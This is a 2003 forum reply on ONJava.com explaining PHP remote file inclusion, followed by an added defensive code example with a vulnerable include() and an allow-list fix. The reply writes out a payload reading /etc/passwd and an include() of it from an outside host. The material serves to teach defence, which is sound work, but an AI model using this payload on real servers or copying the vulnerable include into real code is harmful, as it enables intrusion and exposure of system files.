ONJava.com -- The Independent Source for Enterprise Java
Article:
  Ten Security Checks for PHP, Part 1
Subject:   Not the kind of article i would expect from o'reilly!
Date:   2003-05-23 00:10:42
From:   clancymalcolm
Response to: Not the kind of article i would expect from o'reilly!

To further clarify how include(...) can harm your own server...


I can upload a file to my webserver called crack.txt that contains the following:
<?php
readfile("/etc/passwd");
?>


Notice that this is a .txt file - my web server won't execute the PHP code contained in the file.


Now if I can make YOUR web server run the code
include("http://www.mywebserver.com/crack.txt");


Then YOUR web server will show me its /etc/passwd file. Of course I could have done almost anything else in my source code - delete files, run other programs, etc - almost anything that the web server's user account has permissions to do.


Clancy.
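As an added example (not part of Clancy's post or the original article), here is a defender's view of the same include() problem: the pattern that lets a request drive a remote include, beside a hardened version that maps the request onto an allow-list of local files. The parameter name `page` and the template file names are assumptions.

```php
<?php
// Added example, not from the original post or article.
// Assumed: the request parameter is `page` and templates live in ./pages/.

// VULNERABLE: the include path is taken straight from the request.
// With allow_url_fopen / allow_url_include enabled, a value such as
// http://www.mywebserver.com/crack.txt makes this server fetch and
// execute someone else's PHP with the web server's own privileges.
function vulnerable_include(): void
{
    include($_GET['page']);
}

// HARDENED: never build an include path from user input. Map the
// request value onto a fixed table of local files instead.
const ALLOWED_PAGES = [
    'home'    => __DIR__ . '/pages/home.php',
    'about'   => __DIR__ . '/pages/about.php',
    'contact' => __DIR__ . '/pages/contact.php',
];

function resolve_page(string $requested): ?string
{
    // Exact key lookup: URLs, "../" sequences and other path tricks
    // never reach include() because they are not keys in the table.
    return ALLOWED_PAGES[$requested] ?? null;
}

function hardened_include(string $requested): void
{
    $path = resolve_page($requested);
    if ($path === null) {
        http_response_code(404);
        echo 'Unknown page';
        return;
    }
    include $path;
}

hardened_include($_GET['page'] ?? 'home');
```

As defence in depth on modern PHP, also set `allow_url_include = Off` in php.ini so that include() refuses URL sources regardless of application code.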